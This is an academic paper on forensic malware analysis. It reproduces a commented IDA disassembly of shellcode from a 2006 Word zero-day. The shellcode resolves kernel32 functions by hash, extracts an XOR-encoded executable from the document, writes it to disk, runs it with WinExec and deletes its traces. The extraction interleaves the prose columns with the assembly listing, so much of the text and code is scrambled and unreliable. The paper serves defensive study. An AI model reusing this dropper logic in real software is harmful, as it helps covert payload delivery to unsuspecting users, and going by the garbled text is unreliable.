S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
Malware Analysis Using Assembly Level Program Dr.K.Kuppusamy,
Associate professor ComputerScience and Engg Dept , AlagappaUniversity,Karaikudi, Tamilnadu,INDIA kkdiksamy@yahoo.com
T
S.Murugan
ACTS Team coordinator , CDAC Knowledge Park, No 1 Old Madras Road,Bangalore, Karnataka,INDIA Murugan.sethu@gmail.com
intrusive, or annoying software or program code. The term
with. One of the advantages of using assembly language is that
computer virus" is sometimes used as a catch-all phrase to
you can both create and combat such programs. Generally, all
include all types of malware, including true viruses.
ES
Abstract-Malware are exciting types of programs to experiment
EFFECTIVE Malware are written in assembly language. It
Software is considered to be malware based on the
would be difficult, if not impossible, to do this with other
perceived intent of the creator rather than any particular
languages (except for C); although it is quite easy to write a self-
features. Malware includes computer viruses, worms, trojan
reproducing program in any language. Viruses have been used to kill other viruses. One could conceive of viruses and worms
horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software. In law, malware
without direct intervention of particular users. The ability to
is sometimes known as a computer contaminant, for instance
forensically analyze malicious software is
becoming an
in the legal codes of several U. S. states, including California
increasingly important discipline in the field of Digital
and West Virginia. Malware is not the same as defective
Forensics. This is because malware is becoming stealthier,
software, which is software that has a legitimate purpose but
targeted, profit
contains harmful bugs.
A
that run around through a system carrying out useful tasks
driven, managed by criminal organizations,
harder to detect and much harder to analyze. Malware analysis
Preliminary results from Symantec published in
requires a considerable skill set to look into deep malware
2008 suggested that "the release rate of malicious code and
IJ
internals when it is designed specifically to detect and hold back such attempts. A surplus of tools are available to the analyst
other unwanted programs may be exceeding that of
including debuggers, disassemblers, de-compilers, memory
legitimate software applications." According to F-Secure,
dumpers, unpackers as well as many other tools common to the
"As much malware [was] produced in 2007 as in the previous
discipline of software engineering. All of these tools require
20 years altogether." Malware's most common pathway from
niche expertise and a thorough understanding of the principles
criminals to users is through the Internet: primarily by e-mail
of their operation and the computers they execute on.
and the World Wide Web.
1. INTRODUCTION
The prevalence of malware as a vehicle for
Malware, short for malicious software, is software
organized Internet crime, along with the general inability of
designed to infiltrate a computer system without the owner's
traditional anti-malware protection platforms (products) to
informed consent. The expression is a general term used by
protect against the continuous stream of unique and newly
computer professionals to mean a variety of forms of hostile,
produced malware, has seen the adoption of a new mindset
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 1
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
for businesses operating on the Internet: the acknowledgment
Another strictly for-profit category of malware has
that some sizable percentage of Internet customers will
emerged in spyware -- programs designed to monitor user’s
always be infected for some reason or another, and that they
web browsing, display unsolicited advertisements, or redirect
need to continue doing business with infected customers. The
affiliate marketing revenues to the spyware creator. Spyware
result is a greater emphasis on back-office systems designed
programs do not spread like viruses; they are, in general,
to spot fraudulent activities associated with advanced
installed by exploiting security holes or are packaged with
malware operating on customers' computers.
user-installed software, such as peer-to-peer applications.
On March 29, 2010, Symantec Corporation named Shaoxing, China as the world's malware capital.
The best-known types of malware, viruses and worms, are known for the manner in which they spread, rather than any other particular behavior. The term computer
software, and may come from an official site. Therefore,
virus is used for a program that has infected some executable
some security programs, such as McAfee may call malware
software and that causes that when run; spread the virus to
"potentially unwanted programs" or "PUP".
other executables. Viruses may also contain a payload that
T
Sometimes, malware is disguised as genuine
performs other actions, often malicious. A worm, on the
Internet Worm and a number of MS-DOS viruses, were
other hand, is a program that actively transmits itself over a
written as experiments or pranks. They were generally
network to infect other computers. It too may carry a
intended to be harmless or merely annoying, rather than to
payload. These definitions lead to the observation that a virus
cause serious damage to computer systems. In some cases,
requires user intervention to spread, whereas a worm spreads
the perpetrator did not realize how much harm their creations
itself automatically. Using this distinction, infections
would do.
transmitted by email or Microsoft Word documents, which
ES
Many early infectious programs, including the first
rely on the recipient opening a file or email to infect the
A
Young programmers learning about viruses and
system, would be classified as viruses rather than worms.
their techniques wrote them for the sole purpose that they
Before Internet access became widespread, viruses
could or to see how far it could spread. As late as 1999,
spread on personal computers by infecting the executable
widespread viruses such as the Melissa virus appear to have
boot sectors of floppy disks. By inserting a copy of it into the
been written chiefly as pranks.
machine code instructions in these executables, a virus causes itself to be run whenever a program is run or the disk is
programs designed to cause harm or data loss. Many DOS
booted. Early computer viruses were written for the Apple II
viruses, and the Windows ExploreZip worm, were designed
and Macintosh, but they became more widespread with the
to destroy files on a hard disk, or to corrupt the file system by
dominance of the IBM PC and MS-DOS system. Executable-
writing invalid data to them. Network-borne worms such as
infecting viruses are dependent on users exchanging software
the 2001 Code Red worm or the Ramen worm fall into the
or boot-able floppies, so they spread rapidly in computer
same category. Designed to vandalize web pages, worms
hobbyist circles.
IJ
Hostile intent related to vandalism can be found in
may seem like the online equivalent to graffiti tagging, with
The
first
worms,
network-borne
infectious
the author's alias or affinity group appearing everywhere the
programs, originated not on personal computers, but on
worm goes.
multitasking UNIX systems. The first well-known worm was the Internet Worm of 1988, which infected SunOS and VAX
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 2
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
BSD systems. Unlike a virus, this worm did not insert itself
It is undeniable that there is a digital arms race
into other programs. Instead, it exploited security holes
between malware developers and malware researchers. As
(vulnerabilities) in network server programs and started itself
soon as a technique is developed by one side, the other side
running as a separate process. This same behavior is used by
implements a counter measure. Two of the major trends are
today's worms as well.
that attackers are increasingly motivated by financial gain and that there are indications that malware development is becoming increasingly commercialized and developed by
the 1990s, and the flexible macros of its applications, it
professionals with extensive software engineering abilities.
became possible to write infectious code in the macro
Another trend is that malware has an increasing variety of
language of Microsoft Word and similar programs. These
techniques available to hinder the forensic analyst. This can
macro viruses infect documents and templates rather than
include detection of the tools used by the forensic analyst and
applications (executables), but rely on the fact that macros in
prevention of analysis via anti-debugging, anti-disassembly,
a Word document are a form of executable code.
anti-emulation, anti-memory dumping, incorporation of fake
T
With the rise of the Microsoft Windows platform in
signatures and code obfuscation.
ES
Today, worms are most commonly written for the
Windows OS, although a few like Mare-D and the Lion
Signature based detection of malware is dependent
worm are also written for Linux and UNIX systems. Worms
upon an analyst having already analyzed the malware and
today work in the same basic way as 1988's Internet Worm:
extracted a signature as well as the end user having updated
they scan the network and leverage vulnerable computers to
their malware signature file.
replicate. Because they need no human intervention, worms can spread with incredible speed.
Although these techniques go some way in
A
protecting a system they are far from infallible and only of
INTRODUCTION
minor assistance to the forensic analyst, especially if the
Malware as “software whose intent is malicious, or
malware is new or has been customized. The increasing
whose effect is malicious�. Analysis of malicious software is
availability of high speed network Internet connections has
essential for computer security professionals and digital
also enabled the rapid production and dissemination of the
forensic analysts and is emerging as an important field of
malware. All of these factors are contributing to increasing
research. Malware is often targeted at organizations and is
numbers of network borne malware with respect to volume,
increasingly using anti-forensics techniques to prevent
variety and complexity. Security professionals in the field
detection and analysis. Commercial Anti-Virus (AV)
need to know how to determine if they are the target of an
software is often limited in its ability to detect and remove
attack and how to eradicate or mitigate threats from their
malware. It is highly unlikely to detect new malware that is
systems. This process of threat reduction can be assisted if
unleashed on the internet, corporate intranet or that has been
security professionals have up to date methodologies and
customized to target specific networks. It is also unlikely to
skill sets at their disposal.
IJ
2.
detect malware that has been customized to target specific networks.
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 3
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
3. THE PROBLEM WITH MALWARE ANALYSIS
Dynamic analysis, in contrast, does run the code and the analyst observes its behavior and interaction with the host
threat is expansive. A non exhaustive list includes root kits,
and network via mechanisms such as registry, file and
worms, bots, trojans, logic bombs, viruses, phishing, spam,
network monitoring tools. This technique is generally much
spyware, adware, key loggers and backdoors. No computing
easier to conduct than static analysis but is also easily
platform or environment is immune to these threats.
hindered by malware that can detect the use of an emulation
Traditionally, malware is thought of as a virus or worm that
environment such as VMware or the use of debugging tools
has
resulting
such as IDA Pro. By detecting the use of these tools and
countermeasure for traditional malware has been the
environments, the malware can change its behavior. Once
employment of a removal tool that was initiated by signature
detected, the malware can decide not to run its true payload
detection or by recognition of heuristics defined by specific
and can run in a deceptive mode that makes it look like much
behaviors. These tended to be like the malware they were
less of a threat.
a
single
function
or
payload.
The
T
The spectrum of malware that represents a real
It can delete itself together with any evidence, or if
Modern network borne malware is increasingly
it is running with the appropriate privileges, damage or
multi-partite in nature incorporating several infection vectors
destroy the system that it is being run on or attached uses an
and possible payloads in the one instance. Signature based
iterative and recursive technique that incorporates both the
systems that rely on file hashing or similar functions that
static and dynamic analysis techniques to extract the full
uniquely identify malware based on file contents are
functionality of the code in a recursive and iterative
increasingly failing due to the mass customization allowable
technique that spirals into the analysis from the higher level
with the use of frameworks .Furthermore, anti-forensic
view to the more detailed view. This technique also
techniques are widely deployed to obfuscate infection, hinder
facilitates the opportunity to discover and mitigate anti
detection and retard eventual removal of the malware. This
forensic techniques as the analysis process proceeds.
A
ES
responding to in that they were unitary or singular in purpose.
increasing complexity and entropy makes modern malware analysis a significant undertaking that takes considerable
4. ANALYSIS PROCESS A high level and simplistic view of the malware
either in an individual or in coverage provided by a team of
analysis process is depicted in figure 1 below. It shows
analysts.
malware as one of two inputs to the analysis methodology
IJ
time, expertise and requires an extensive knowledge domain
Two fundamental techniques available to the analyst
process which produces a report as an output. The generated
are static and dynamic analysis. Static analysis does not
results also feedback into the analysis methodology via an
execute the code and the code is analyzed via disassemblies,
assessment process which can be used to adjust the
call graphs, searches for strings, library calls, and
methodology dynamically, or as a process improvement
reconstruction of data structures, enumerations and unions
mechanism. Legal and ethical constraints serve as a bounding
within the code. This analysis technique is very time
constraint to the process.
consuming and easily hindered by anti-forensics in the form of code obfuscation, packers and protectors which are increasingly being used by malware authors.
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 4
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
PaiMei. Static analysis is the examination of source code logic and behaviors, whereas dynamic analysis is the monitoring and observation of the code as it executes. Both techniques have strengths. Obfuscation of code may render static analysis null and void. However, dynamic execution of that code segment may reveal the next code sections required for
further
static
analysis.
Other
common
software
engineering techniques, such as profiling, tracing and debugging are also available, applicable and have utility in malware analysis. The diversity of malware modus operandi
malware. Systems level programming, high level languages,
requires a range of approaches and techniques to perform
scripting and even assembly language programming are
successful dissection and analysis of the malware. The skills
important skills required to understand how malware is
needed to perform competent analysis are profound, highly
implemented and how it takes advantage of vulnerabilities. It
technical and are at the cutting edge of computer science.
T
Programming skills are vital for in depth analysis of
A surplus of tools are available to the analyst
customized tools and for scripting disassemblers and
including debuggers, disassemblers, de-compilers, memory
debuggers. The poser of being able to script debuggers and
dumpers, unpackers as well as many other tools common to
disassemblers should not be underestimated in a malware
the discipline of software engineering. All of these tools
analysis context. Many analysis tools now also allow
require niche expertise and a thorough understanding of the
additional functionality to be added by allowing users to
principles of their operation and the computers they execute
write customized Dynamic Link Library (DLL) plugins or
on. However, whether or not the tools are forensically sound
scripting languages such as IDA Python which integrates
and their use acceptable in a court of law is a matter that
A
ES
is also an important skill set for the development of
IDA Pro scripting with the Python scripting language.
needs to be seriously considered.
Producers of malware also develop and utilize Some useful tools are available from hacking and
distributed computing to enable a competitive advantage over
software cracking sites that would not be considered
detection software and techniques. Therefore, it is imperative
forensically sound without considerable validation or black
that a malware analyst also be well versed in cutting edge
box testing. Such tools could contain trojans and could easily
technologies and techniques.
hide a malicious purpose. They may not be forensically
IJ
advanced programming techniques and technologies such as
5. MALWARE ANALYSIS
acceptable without significant due diligence on the part of the person or organizations using these types of tools. Other
An adaptive, eclectic choice of techniques is
software cracking or reverse engineering sites have scripts
required for analysis of malware. Various frameworks and
for debuggers that can be easily and readily examined. These
methodologies such as static and dynamic analysis exist for
scripts are useful to extract the known algorithm for dealing
the malware analyst to analyze malware such as
with particular packers or to mitigate particular anti-forensic techniques used by creators of such software.
ISSN: 2230-7818
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 5
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000000 ; +------------------------------------------------------------------
Analysis
of
malware
will
typically
require
configuring a complete virtual environment suitable for it to
-------+ seg000:00000000 ; seg000:00000000
;
File
Name
:
C:\Documents
and
run in, not only from an operating systems perspective, but
Settings\Administrator\Desktop\PLANNING
also the inclusion of network infrastructure and services.
seg000:00000000 ; Format
Modern malware are increasingly network borne and network
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded
enabled. So it may be necessary to provide an environment in
REPORT 5-16-2006.doc
: Binary file
length: 246F5h seg000:00000000 ; seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
as Domain Name System (DNS) server, Simple Mail
seg000:00000000 ;
Transfer Protocol (SMTP) server or an Internet Relay Chat
seg000:00000000 ; This is a commented dissassembly of the Word 0-day
(IRC) server. Establishment of this style of environment
released in
T
which the malware can utilize commonly used services such
seg000:00000000 ; mid-late May 2006. This document does not describe the
allows for the malware initiating communications with these
vulnerability
services to allow the dynamic capture of target data to assist
seg000:00000000 ; or malware that results from an infection.
in the dynamic analysis of malware.
seg000:00000000 ;
ES
seg000:00000000 seg000:00000000
This type of environment may be supported by a
seg000:00000000 unicode
macro page,string,zero
virtualized environment using commercial virtualization
seg000:00000000
irpc c,<string>
environments such as VMWare or Virtual PC.
seg000:00000000
db '&c', page
seg000:00000000
endm
ifnb <zero>
seg000:00000000
dw zero
the ability to detect these virtualized environments as a result
seg000:00000000
endif
of their hardware and software fingerprints, the ability to
seg000:00000000 endm
A
seg000:00000000
It should be noted that because malware can contain
configure real systems and devices may need serious
seg000:00000000
seg000:00000000
.686p
consideration. This will require the configuration of a
seg000:00000000
.mmx
particular computing host environment, or network device or
seg000:00000000
.model flat
other system administrative tasks in order to achieve this.
seg000:00000000
seg000:00000000 ----------------------------------------------------------------------
isolation to prevent the spread of malware.
-----
IJ
This type of environment would need strict control and
6. CODE
seg000:00000000 ;
seg000:00000000 ; +------------------------------------------------------------------------+ seg000:00000000 ; ¦ Disassembler (IDA)
This file is generated by The Interactive ¦
seg000:00000000 ; ¦ <ida@datarescue.com>
ISSN: 2230-7818
Copyright (c) 2006 by DataRescue sa/nv, ¦
seg000:00000B2E seg000:00000B2E
; The shellcode starts here. It uses Dino Dai
Zovi's PEB resolution method seg000:00000B2E
; to load the base address of kernel32.dll. This
information will be seg000:00000B2E
; used to locate the addresses of kernel32's
exports (because they seg000:00000B2E
; are offsets from the base address).
seg000:00000B2E seg000:00000B2E
nop
seg000:00000B2F
nop
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 6
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000B30
mov
eax, fs:off_30 ; load PEB address into
seg000:00000B59
mov
[edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C
add
eax, 0Ch
seg000:00000B36
mov
eax, [eax+0Ch]
seg000:00000B5F
mov
[edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B39
mov
esi, [eax+1Ch]
seg000:00000B62
add
eax, 12h
seg000:00000B3C
lodsd
seg000:00000B65
mov
[edi+SCRATCH.String3], eax ; c:\~.exe
eax
seg000:00000B3D
mov
seg000:00000B40
jmp
esi, [eax+8]
; kernel32.dll entry point
seg000:00000B6B
push
edi
; saves the scratch pad for
use within loc_BA1
loc_DAF
seg000:00000B6C
seg000:00000B40
mov
edi, esp
seg000:00000B6E
xor
edi, 0FFFFh
which immediately calls sub_B45.
seg000:00000B74
dec
edi
seg000:00000B40
seg000:00000B75
dec
edi
seg000:00000B76
dec
edi
; At this point, the code jumps to loc_DAF,
; In doing so, the call instruction sets EIP to
0x00000DB4 (offset in seg000:00000B40
; this file) and pushes it on the stack. Notably,
seg000:00000B77
T
seg000:00000B40
seg000:00000B77
the first seg000:00000B40
; instruction in sub_B45 is to pop this address
original Word document's
into eax (see below)
seg000:00000B77
seg000:00000B40
esp pointer into edi.
; own filename. The last mov (above) places the
;
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
S
U
B
; The loop works by reading a dword from edi
and comparing it to the
; unicode equivalent of "oc". If it matches then
; for ".d" (which completes the ".doc"
extension). Otherwise,
A
; but a dword (0A2000h) and three unicode
; The code uses the offset of these values from
; builds a structure with pointers to them. The
IJ
; to store addresses of all the kernel32 exports
later. In the code
; it decrements edi and grabs another dword.
When done, it jumps seg000:00000B77
seg000:00000B45
seg000:00000B45
E
; into the eax register. If you look at
0x00000DB4, there isn't much,
same structure will be used
N
seg000:00000B77
seg000:00000B45
seg000:00000B45
I
; The first part of this code loads the address to
which EIP points
EIP to reference them and
T
seg000:00000B77
seg000:00000B45
seg000:00000B45
U
it begins to search
seg000:00000B45
strings of file names.
O
seg000:00000B77
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
seg000:00000B45
R
ES
seg000:00000B77
seg000:00000B45 seg000:00000B45
; The next instructions search memory for the
; to loc_BA1.
seg000:00000B77
seg000:00000B77 loc_B77: sub_B45+39j seg000:00000B77
; sub_B45+45j ...
seg000:00000B77
dec
edi
seg000:00000B78
cmp
dword ptr [edi], 63006Fh ; "oc"
seg000:00000B7E
jnz
short loc_B77
seg000:00000B80
dec
edi
seg000:00000B81
dec
edi
member of the structure.
seg000:00000B82
dec
edi
seg000:00000B45
seg000:00000B83
dec
edi
seg000:00000B84
cmp
seg000:00000B8A
jnz
seg000:00000B45
; below, edi contains a pointer to the first
seg000:00000B45 sub_B45
proc near
; CODE XREF:
seg000:loc_DAFp
dword ptr [edi], 64002Eh ; ".d" short loc_B77
seg000:00000B45
pop
eax
seg000:00000B8C
push 0C8h
seg000:00000B46
sub
esp, 200h
seg000:00000B91
pop
ecx
seg000:00000B92
mov
esi, edi
seg000:00000B4C
mov
edi, esp
seg000:00000B4E
mov
ebx, [eax]
seg000:00000B50
mov
[edi+4], ebx
seg000:00000B53
mov
ISSN: 2230-7818
add
eax, 4
seg000:00000B94 seg000:00000B94 loc_B94:
[edi+SCRATCH.hKernel32], esi ; entry
point of kernel32 seg000:00000B56
; [eax] == 0A2000h
; CODE XREF:
; CODE XREF:
sub_B45+58j seg000:00000B94
dec
esi
seg000:00000B95
cmp
dword ptr [esi], 5C003Ah
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
Page 7
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000B9B
jz
short loc_BA1
; finished - jump to
loc_BA1
seg000:00000BB7
push
[edi+SCRATCH.hKernel32]
seg000:00000BBA
push 7CB922F6h
seg000:00000B9D
loop loc_B94
seg000:00000BBF
call
seg000:00000B9F
jmp
seg000:00000BC4
mov
seg000:00000BC7
push dword ptr [edi+8]
short loc_B77 ; failed - start over again
from loc_B77
; GlobalFree
resolve_func [edi+SCRATCH.pGlobalFree], eax
seg000:00000BCA
push 7C0017BBh
seg000:00000BA1 ; --------------------------------------------------------------------
seg000:00000BCF
call
-------
seg000:00000BD4
mov
seg000:00000BD7
push dword ptr [edi+8]
seg000:00000BDA
push 0FFD97FBh
seg000:00000BA1
; This is the section that fills the shellcode's
own structure seg000:00000BA1
; members with pointers to kernel32 exports.
Once again, edi contains seg000:00000BA1
; the pointer to the structure's first member, so
all [edi+xyz] are seg000:00000BA1
; references to the additional members. The
loop here consists of ; pushing two parameters on the stack - a
dword hash of the function name seg000:00000BA1
; (probably hashed to obfuscate the functions it
imports) and the seg000:00000BA1
; entry point for kernel32.dll. Each iteration
calls resolve_func seg000:00000BA1
; for the actual work (see 0x00000D5B of this
file). When complete, seg000:00000BA1
; the code knows exactly where to find all the
system resources and ; functions it needs.
seg000:00000BA1
;
seg000:00000BA1 operands are natively seg000:00000BA1
; Note the xyz field in all the [edi+xyz]
; numerical. My co-worker Ryan reversed the
IJ
resolve_func sub routine
A
seg000:00000BA1
seg000:00000BA1
; and renamed them for readability.
; CloseHandle
seg000:00000BDF
call
resolve_func
seg000:00000BE4
mov
[edi+SCRATCH.pCloseHandle], eax
seg000:00000BE7
push
dword ptr [edi+8]
seg000:00000BEA
push 10FA6516h
; ReadFile
seg000:00000BEF
call
resolve_func
seg000:00000BF4
mov
[edi+SCRATCH.pReadFile], eax
seg000:00000BF7
push
dword ptr [edi+8]
seg000:00000BFA
push 0E80A791Fh
seg000:00000BFF
call
ES
seg000:00000BA1
[edi+SCRATCH.pCreateFileW], eax
T
seg000:00000BA1
; CreateFileW
resolve_func
; WriteFile
resolve_func
seg000:00000C04
mov
[edi+SCRATCH.pWriteFile], eax
seg000:00000C07
push
dword ptr [edi+8]
seg000:00000C0A
push 0C2FFB03Bh
seg000:00000C0F
call
; DeleteFileW
resolve_func
seg000:00000C14
mov
[edi+SCRATCH.pDeleteFileW], eax
seg000:00000C17
push
dword ptr [edi+8]
seg000:00000C1A
push 76DA08ACh
seg000:00000C1F
call
seg000:00000C24
mov
[edi+SCRATCH.pSetFilePointer], eax
seg000:00000C27
push
dword ptr [edi+8]
seg000:00000C2A
push 0E8AFE98h
; SetFilePointer
resolve_func
; WinExec
seg000:00000C2F
call
seg000:00000C34
mov
resolve_func [edi+SCRATCH.pWinExec], eax
seg000:00000C37
push
dword ptr [edi+8]
seg000:00000C3A
push 99EC8974h
; CopyFileW
seg000:00000BA1
seg000:00000C3F
call resolve_func
seg000:00000BA1
seg000:00000C44
mov
[edi+SCRATCH.pCopyFileW], eax
seg000:00000C47
push
dword ptr [edi+8]
seg000:00000BA1 loc_BA1:
; CODE XREF:
sub_B45+56j
seg000:00000C4A
push 73E2D87Eh
seg000:00000BA1
dec
esi
seg000:00000C4F
call resolve_func
seg000:00000BA2
dec
esi
seg000:00000C54
mov
seg000:00000BA3
pop
edi
seg000:00000C54
seg000:00000BA4
mov
[edi+SCRATCH.szDOCFILENAME],
esi
seg000:00000C54
; ExitProcess
[edi+SCRATCH.pExitProcess], eax
; Delete any previously existing files of the
same name. Recall these are
seg000:00000BA7
push
seg000:00000BAA
push 0C0397ECh
seg000:00000BAF
call
seg000:00000BB4
mov
ISSN: 2230-7818
[edi+SCRATCH.hKernel32] ; GlobalAlloc
resolve_func
seg000:00000C54
; two of the three unicode file names discussed
earlier. seg000:00000C54
[edi+SCRATCH.pGlobalAlloc], eax
seg000:00000C57
push
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
[edi+SCRATCH.String2] ; c:\~.exe
Page 8
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000C5A
call
[edi+SCRATCH.pDeleteFileW]
seg000:00000C86
mov
[edi+SCRATCH.hInputFile], eax FILE_END
seg000:00000C5D
push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C89
push
seg000:00000C60
call
seg000:00000C8B
push 0
[edi+SCRATCH.pDeleteFileW]
seg000:00000C63 seg000:00000C63
; The next 3 push instructions are preparing the
arguments for CopyFile. seg000:00000C63
; Top down, they are 0 (for overwriting
permission), destination
seg000:00000C8D
push
seg000:00000C8F
push [edi+SCRATCH.hInputFile]
-4
seg000:00000C92
call
seg000:00000C95
push
seg000:00000C97
lea
[edi+SCRATCH.pSetFilePointer] 0 ebx, [edi+SCRATCH.endMarker]
seg000:00000C9D
push ebx
the code's memory searching
seg000:00000C9E
push 4
seg000:00000C63
seg000:00000CA0
lea
seg000:00000CA3
push ebx push
seg000:00000C63
; file name, and source file name (derived by
; technique).
seg000:00000C63
ebx, [edi+SCRATCH.field_4]
push
0
seg000:00000CA4
seg000:00000C65
push
[edi+SCRATCH.String1] ; c:\~$
c:\~$
seg000:00000C68
push
[edi+SCRATCH.szDOCFILENAME]
seg000:00000CA7
call
seg000:00000C6B
call [edi+SCRATCH.pCopyFileW]
seg000:00000CAA
push [edi+SCRATCH.field_4]
seg000:00000CAD
seg000:00000C6E ; The next 7 push instructions are preparing the
arguments for CreateFile. seg000:00000C6E
; Despite the function name, this only opens an
already existing file (in seg000:00000C6E
; particular an exact copy of the original Word
document now at c:\~$ after seg000:00000C6E
; CopyFile).
seg000:00000C6E
heap
[edi+SCRATCH.pReadFile]
push
ES
seg000:00000C6E
[edi+SCRATCH.hInputFile] ; handle to
T
seg000:00000C63
40h ; '@'
; allocate 40 bytes on
seg000:00000CAF
call
[edi+SCRATCH.pGlobalAlloc]
seg000:00000CB2
mov
[edi+SCRATCH.pMallocdBuff0], eax
seg000:00000CB5
mov
ebx, [edi+SCRATCH.field_4]
seg000:00000CB8
add
ebx, 4
seg000:00000CBB
not
ebx
seg000:00000CBD
inc
ebx
seg000:00000CBE
push 2
; new offsets and starting loc
seg000:00000CC0
push 0
seg000:00000CC2
push ebx
seg000:00000CC3
push [edi+SCRATCH.hInputFile]
0
seg000:00000CC6
call
0
seg000:00000CC9
push 0
push 0
seg000:00000C70
push
80h
seg000:00000C75
push
3
seg000:00000C77
push
seg000:00000C79
push
A
seg000:00000C6E
[edi+SCRATCH.pSetFilePointer]
seg000:00000C7B
push 80000000h
seg000:00000CCB
lea
seg000:00000C80
push
seg000:00000CD1
push ebx
seg000:00000C83
call
seg000:00000CD2
push [edi+SCRATCH.field_4]
seg000:00000CD5
push [edi+SCRATCH.pMallocdBuff0]
seg000:00000CD8
push [edi+SCRATCH.hInputFile]
seg000:00000CDB
call
seg000:00000CDE
push [edi+SCRATCH.hInputFile]
seg000:00000CE1
call
[edi+SCRATCH.pCloseHandle]
seg000:00000CE4
mov
eax, [edi+SCRATCH.field_4]
seg000:00000CE7
mov
ebx, [edi+SCRATCH.pMallocdBuff0]
[edi+SCRATCH.String1] ; c:\~$
IJ
[edi+SCRATCH.pCreateFileW]
seg000:00000C86 seg000:00000C86
; This is where it gets a little interesting. The
code places its read seg000:00000C86
; pointer at EOF and moves -4 bytes (back
toward the beginning). This seg000:00000C86
; is the offset to where the output file begins. It
reads data into
seg000:00000C86
; a buffer, makes a call to allocate storate on
seg000:00000C86
; read pointer and does a second iteration with
seg000:00000C86
; has collected all the data, it proceeds to
; previous ReadFile() functions and xor's them
with 0x81. In the instructions,
loc_CEA for processing.
seg000:00000CEA
seg000:00000C86
This xor-encoding
ISSN: 2230-7818
; This section of code loops through all bytes in
the buffer filled by the seg000:00000CEA
different offsets. Once it
[edi+SCRATCH.pReadFile]
seg000:00000CEA seg000:00000CEA
the heap, then resets the
ebx, [edi+SCRATCH.endMarker]
@ 2011 http://www.ijaest.iserp.org. All rights Reserved.
; ebx is the array index and eax is the counter.
Page 9
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012
seg000:00000CEA
; scheme obfuscates the code and could help
evade IDS detection in seg000:00000CEA
; some cases.
seg000:00000CEA seg000:00000CEA loc_CEA:
; CODE XREF:
seg000:00000D3C seg000:00000D3C
call
seg000:00000D3F
push [edi+SCRATCH.pMallocdBuff0]
seg000:00000D42
call
seg000:00000CEA
xor
byte ptr [ebx], 81h ; The output file is
; Here the code calls WinExec() to launch the
new executable it has just seg000:00000D45
static xor'd with 0x81
; written to disk. Then it deletes the copy of the
seg000:00000CED
inc
ebx
original Word doc that
seg000:00000CEE
dec
eax
seg000:00000D45
eax, 0
seg000:00000D45
seg000:00000CEF
cmp
seg000:00000CF2
jnz
short loc_CEA
[edi+SCRATCH.pGlobalFree]
seg000:00000D45 seg000:00000D45
sub_B45+1ADj
[edi+SCRATCH.pCloseHandle]
; it saved to c:\~$ and exits.
seg000:00000D45
push
0
push
[edi+SCRATCH.String3] ; c:\~.exe
seg000:00000D4D
call
[edi+SCRATCH.pWinExec]
seg000:00000D50
push
; Write it to disk of course! And use the last
seg000:00000D53
call
remaining unicode string as its
seg000:00000D56
push
seg000:00000CF4
seg000:00000D58
call
seg000:00000CF4 the heap. What to do with it? seg000:00000CF4
seg000:00000D58 sub_B45
seg000:00000CF4 seg000:00000CF4
push 0
seg000:00000CF6
push 80h
seg000:00000CFB
push 2
seg000:00000CFD
push 0
seg000:00000CFF
push 0
seg000:00000D01
push
seg000:00000D06
push
seg000:00000D09
call
seg000:00000D0C
mov
[edi+SCRATCH.String1] ; c:\~$
[edi+SCRATCH.pDeleteFileW] 0
[edi+SCRATCH.pExitProcess]
ES
; file name.
T
seg000:00000D47 ; At this point, the decoded payload exists on
seg000:00000CF4
endp
seg000:00000D58
seg000:00000D5B seg000:00000D5B
;
¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
S
U
B
R
[edi+SCRATCH.String2] ; c:\~.exe [edi+SCRATCH.pCreateFileW]
A
[edi+SCRATCH.hFileTwo], eax
seg000:00000D5B resolve_func
N
E
proc near
; CODE XREF:
sub_B45+6Ap
push 0
seg000:00000D5B seg000:00000D5B
seg000:00000D17
push
ebx
